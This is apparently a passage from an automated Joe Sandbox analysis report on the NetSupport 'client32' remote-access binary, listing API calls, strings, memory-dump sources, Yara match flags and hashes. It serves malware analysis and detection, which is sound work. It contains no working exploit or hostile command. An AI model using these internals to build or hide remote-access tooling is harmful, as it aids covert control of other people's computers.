                                                        • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11080793
                                                        • wsprintfA.USER32 ref: 1108081B
                                                        • wsprintfA.USER32 ref: 11080832
                                                        • wsprintfA.USER32 ref: 11080849
                                                        • CloseHandle.KERNEL32(00000000,11080570,00000001,00000000), ref: 1108099A
                                                          • Part of subcall function 11080380: CloseHandle.KERNEL32(?,771AF550,?,?,110809C0,?,1102FD62,030634C0,00000000,?,?,?), ref: 11080398
                                                          • Part of subcall function 11080380: CloseHandle.KERNEL32(?,771AF550,?,?,110809C0,?,1102FD62,030634C0,00000000,?,?,?), ref: 110803AB
                                                          • Part of subcall function 11080380: CloseHandle.KERNEL32(?,771AF550,?,?,110809C0,?,1102FD62,030634C0,00000000,?,?,?), ref: 110803BE
                                                          • Part of subcall function 11080380: FreeLibrary.KERNEL32(00000000,771AF550,?,?,110809C0,?,1102FD62,030634C0,00000000,?,?,?), ref: 110803D1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                        • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                        APIs
                                                          • Part of subcall function 11102790: SetEvent.KERNEL32(00000000), ref: 111027B4
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102AE05
                                                        • GetTickCount.KERNEL32 ref: 1102AE2A
                                                          • Part of subcall function 110C57C0: __strdup.LIBCMT ref: 110C57DA
                                                        • GetTickCount.KERNEL32 ref: 1102AF24
                                                          • Part of subcall function 110C6420: wvsprintfA.USER32(?,?,?), ref: 110C644B
                                                          • Part of subcall function 110C5870: _free.LIBCMT ref: 110C589D
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102B01C
                                                        • CloseHandle.KERNEL32(?), ref: 1102B038
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                        • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1105D01A
                                                          • Part of subcall function 1105CA00: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1105CA3C
                                                          • Part of subcall function 1105CA00: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 1105CA94
                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 1105D06B
                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 1105D125
                                                        • RegCloseKey.ADVAPI32(?), ref: 1105D141
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Similarity
                                                        • API ID: Enum$Open$CloseValue
                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C849898,?,?,6C80BDFC,00000000), ref: 6C804E89
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C804ED3
                                                        • SetLastError.KERNEL32(00000078,00000000,00000000,?,?,6C80BDFC,00000000), ref: 6C804EE8
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C804F07
                                                        • SetLastError.KERNEL32(00000078,?,?,6C80BDFC,00000000), ref: 6C804F1C
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C804F3B
                                                        • SetLastError.KERNEL32(00000078,?,?,6C80BDFC,00000000), ref: 6C804F5B
                                                        • closesocket.WSOCK32(?,00000000,?,?,6C80BDFC,00000000), ref: 6C804F72
                                                        • GetLastError.KERNEL32(?,00000000,?,?,6C80BDFC,00000000), ref: 6C804F7B
                                                        • _memset.LIBCMT ref: 6C804FA2
                                                        • LeaveCriticalSection.KERNEL32(6C849898,?,?,6C80BDFC,00000000), ref: 6C804FC0
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$AddressProc$CriticalSection$EnterLeave_memsetclosesocket
                                                        • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$InternetCloseHandle
                                                        APIs
                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102C538,00000000,82E0FB89,?,00000000,00000000), ref: 1102B7F4
                                                        • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102B80A
                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102B81E
                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102B825
                                                        • Sleep.KERNEL32(00000032), ref: 1102B836
                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102B846
                                                        • Sleep.KERNEL32(000003E8), ref: 1102B892
                                                        • CloseHandle.KERNEL32(?), ref: 1102B8BF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                        • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                        • API String ID: 83693535-2077998243
                                                        • Opcode ID: 9b98cabf2bc657b91fee656e7895e92de7935bc05c4c4817cdead5248451a21a
                                                        • Instruction ID: cf41a154579764f7ce3274c9b2e845f0c1fb444b2ec11e79c6a8ee3683002965
                                                        • Opcode Fuzzy Hash: 9b98cabf2bc657b91fee656e7895e92de7935bc05c4c4817cdead5248451a21a
                                                        • Instruction Fuzzy Hash: C7B18075E016259FDB21CF24CC84BEAB7B5AF49708F5441E9E91DAB381DB70AA80CF50
                                                        APIs
                                                          • Part of subcall function 11083B60: UnhookWindowsHookEx.USER32(?), ref: 11083B83
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11025FE4
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11026053
                                                        • PostMessageA.USER32(0001042A,00000501,00000000,00000000), ref: 11026070
                                                        • SetEvent.KERNEL32(00000280), ref: 11026081
                                                        • Sleep.KERNEL32(00000032), ref: 11026089
                                                        • PostMessageA.USER32(0001042A,00000800,00000000,00000000), ref: 110260BA
                                                        • GetCurrentThreadId.KERNEL32 ref: 110260D3
                                                        • GetThreadDesktop.USER32(00000000), ref: 110260DA
                                                        • SetThreadDesktop.USER32(00000000), ref: 110260E3
                                                        • CloseDesktop.USER32(00000000), ref: 110260EE
                                                        • CloseHandle.KERNEL32(00000328), ref: 1102612E
                                                          • Part of subcall function 111035C0: GetCurrentThreadId.KERNEL32 ref: 11103656
                                                          • Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(-00000010,?,1102F49F,00000001,00000000), ref: 11103669
                                                          • Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(111DC080,?,1102F49F,00000001,00000000), ref: 11103678
                                                          • Part of subcall function 111035C0: EnterCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110368C
                                                          • Part of subcall function 111035C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F49F), ref: 111036B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                        • String ID: Async
                                                        • API String ID: 3276504616-2933828738
                                                        • Opcode ID: b50dc5c0cc4fa15673a632a8a85fb69b85e9462f34217c182deadf66214dd1e7
                                                        • Instruction ID: 873e3f0f6254a7a416be60b73c140a8ee0daa72de0c8f2a6b091f21df20a38d3
                                                        • Opcode Fuzzy Hash: b50dc5c0cc4fa15673a632a8a85fb69b85e9462f34217c182deadf66214dd1e7
                                                        • Instruction Fuzzy Hash: D7419F76E01221AFEB11DF64CCC9F6AB7B5AB48708F104179FE25972C4EB75A800CB95
                                                        APIs
                                                        • wsprintfA.USER32 ref: 11124210
                                                        • GetTickCount.KERNEL32 ref: 11124241
                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11124254
                                                        • GetTickCount.KERNEL32 ref: 1112425C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick$FolderPathwsprintf
                                                        • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                        • API String ID: 1170620360-4157686185
                                                        • Opcode ID: b0bcc0f5a6366163d0729c56afd56097aa9a4968172ae497a6bbf09a569205e6
                                                        • Instruction ID: e5427a7216b44c3460126721b628d5672ac8883cc02d2755d7c854ad9c2544d9
                                                        • Opcode Fuzzy Hash: b0bcc0f5a6366163d0729c56afd56097aa9a4968172ae497a6bbf09a569205e6
                                                        • Instruction Fuzzy Hash: 95316DBAF402156BDB009BA5BC85FEAF7BC9FA431DF500469EC04A7145EE70B600CB91
                                                        APIs
                                                        • ioctlsocket.WSOCK32 ref: 6C805FF2
                                                        • connect.WSOCK32(00000000,?,000001BB), ref: 6C806009
                                                        • WSAGetLastError.WSOCK32(00000000,?,000001BB), ref: 6C806010
                                                        • _memmove.LIBCMT ref: 6C806083
                                                        • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000), ref: 6C8060A3
                                                        • GetTickCount.KERNEL32 ref: 6C8060C3
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000001,00000000,?,000001BB), ref: 6C8060F3
                                                        • SetLastError.KERNEL32(00000000,00000000,8004667E,00000001,00000000,?,000001BB), ref: 6C8060F9
                                                        • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000), ref: 6C806111
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,000001BB,00000010,00000002,00000001,00000000), ref: 6C806122
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                         • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                        • String ID: ConnectTimeout$General
                                                        • API String ID: 4218156244-3585140716
                                                        • Opcode ID: 1007c662f8e14c601b624ed2c5821ba228f17ff230a167622dcb6e47c2c558ab
                                                        • Instruction ID: f5d565528d52ae3ae46be22479dafa30829e361cc8ee735450a1db608ca1edb1
                                                        • Opcode Fuzzy Hash: 1007c662f8e14c601b624ed2c5821ba228f17ff230a167622dcb6e47c2c558ab
                                                        • Instruction Fuzzy Hash: 8231BD71A043189AE730DB64CE48BDDB3B9AB44308F0049B9E90DD7641D7755AD8DBA1
                                                        APIs
                                                        • _strtok.LIBCMT ref: 11025986
                                                        • _strtok.LIBCMT ref: 110259C0
                                                        • Sleep.KERNEL32(1102E263,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11025AB4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strtok$Sleep
                                                        • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                        • API String ID: 2009458258-3774545468
                                                        • Opcode ID: cf1052e5be71f3d434893412861ad9ad259e2ba0693b2699e7433d6c9e4175ae
                                                        • Instruction ID: 451022f22904edf6d43a1c304369e541f9f29d5ed3a23b240bd98eaa3334767d
                                                        • Opcode Fuzzy Hash: cf1052e5be71f3d434893412861ad9ad259e2ba0693b2699e7433d6c9e4175ae
                                                        • Instruction Fuzzy Hash: 62514635E012669BDF01CF68CCC4BEEFBE1AF81318F5081A9DC5667280E7326445CB85
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C814E05), ref: 6C8076AB
                                                          • Part of subcall function 6C803A70: LoadLibraryA.KERNEL32(psapi.dll,?,6C807708), ref: 6C803A78
                                                        • GetCurrentProcessId.KERNEL32 ref: 6C80770B
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C807718
                                                        • FreeLibrary.KERNEL32(?), ref: 6C8077FF
                                                          • Part of subcall function 6C803AB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C803AC4
                                                          • Part of subcall function 6C803AB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C80774D,00000000,?,6C80774D,00000000,?,00000FA0,?), ref: 6C803AE4
                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C8077EE
                                                          • Part of subcall function 6C803B00: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C803B14
                                                          • Part of subcall function 6C803B00: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C807790,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C803B34
                                                          • Part of subcall function 6C802420: _strrchr.LIBCMT ref: 6C80242E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                         • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                        • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                        • API String ID: 2714439535-3484705551
                                                        • Opcode ID: 398ecd6f3be7eb4cbfaed041e74ef3b063add7f90cb450801c6e28e7c1cdde9e
                                                        • Instruction ID: a0d0ab821ab7463e2f7a599f9d953696833435c9a12ae20b9829755da0281b61
                                                        • Opcode Fuzzy Hash: 398ecd6f3be7eb4cbfaed041e74ef3b063add7f90cb450801c6e28e7c1cdde9e
                                                        • Instruction Fuzzy Hash: 0841C771B002189BDB30DB55CE44FEA7378BB4674CF004D79E90893640EB755A48CBE1
                                                        APIs
                                                          • Part of subcall function 11134770: _memset.LIBCMT ref: 111347B5
                                                          • Part of subcall function 11134770: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 111347CE
                                                          • Part of subcall function 11134770: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111347F5
                                                          • Part of subcall function 11134770: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
                                                          • Part of subcall function 11134770: FreeLibrary.KERNEL32(00000000), ref: 1113481F
                                                          • Part of subcall function 11134770: GetSystemDefaultLangID.KERNEL32 ref: 1113482A
                                                        • AdjustWindowRectEx.USER32(11130C07,00CE0000,00000001,00000030), ref: 111257D7
                                                        • LoadMenuA.USER32(00000000,000003EC), ref: 111257E8
                                                        • GetSystemMetrics.USER32(00000021), ref: 111257F9
                                                        • GetSystemMetrics.USER32(0000000F), ref: 11125801
                                                        • GetSystemMetrics.USER32(00000004), ref: 11125807
                                                        • GetDC.USER32(00000000), ref: 11125813
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1112581E
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 11125827
                                                        • CreateWindowExA.USER32(?,NSMWClass,02D0DEC0,00CE0000,80000000,80000000,?,?,00000000,?,11000000,00000000), ref: 11125869
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceFreeLangMenuProcRectReleaseVersion_memset
                                                        • String ID: F(t$NSMWClass
                                                        • API String ID: 1971969616-79798644
                                                        • Opcode ID: c4fd1fae337c8dcba66663149ed27480893a34112c7b95a9b8bf325c2f5c25ff
                                                        • Instruction ID: 3d151e6aa5795be314d149eabed09166d4b089190cfc9127ba122f3c3f80b994
                                                        • Opcode Fuzzy Hash: c4fd1fae337c8dcba66663149ed27480893a34112c7b95a9b8bf325c2f5c25ff
                                                        • Instruction Fuzzy Hash: 582165B6E40219AFDB10DFE5CC89FAEFBB8EB44704F514529FA15B7284D6B069008B90
                                                        APIs
                                                        • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1114CE58
                                                        • GetLastError.KERNEL32 ref: 1114CE65
                                                        • wsprintfA.USER32 ref: 1114CE78
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 11027FB0: _strrchr.LIBCMT ref: 110280A5
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 110280E4
                                                        • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1114CEBC
                                                        • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1114CEC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                         • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                         • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                        • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                        • API String ID: 1734919802-1728070458
                                                        • Opcode ID: 5d1924ba33bc5dfec19d76dfc76a92801d5f3f97a695d21cd7be10a704ebc820
                                                        • Instruction ID: 1eda9b10f8aec855e66c0cb12e8f2ce1967035abfcae5e92ab0cd4d6df15dcd3
                                                        • Opcode Fuzzy Hash: 5d1924ba33bc5dfec19d76dfc76a92801d5f3f97a695d21cd7be10a704ebc820
                                                        • Instruction Fuzzy Hash: 64110A79E01354EBC720EFE6DCC5B96FBB4BF24318B40462ED86553644EB706540CBA1
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 1110362A
                                                        • __CxxThrowException@8.LIBCMT ref: 1110363F
                                                        • GetCurrentThreadId.KERNEL32 ref: 11103656
                                                        • InitializeCriticalSection.KERNEL32(-00000010,?,1102F49F,00000001,00000000), ref: 11103669
                                                        • InitializeCriticalSection.KERNEL32(111DC080,?,1102F49F,00000001,00000000), ref: 11103678
                                                        • EnterCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110368C
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F49F), ref: 111036B2
                                                        • LeaveCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110373F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
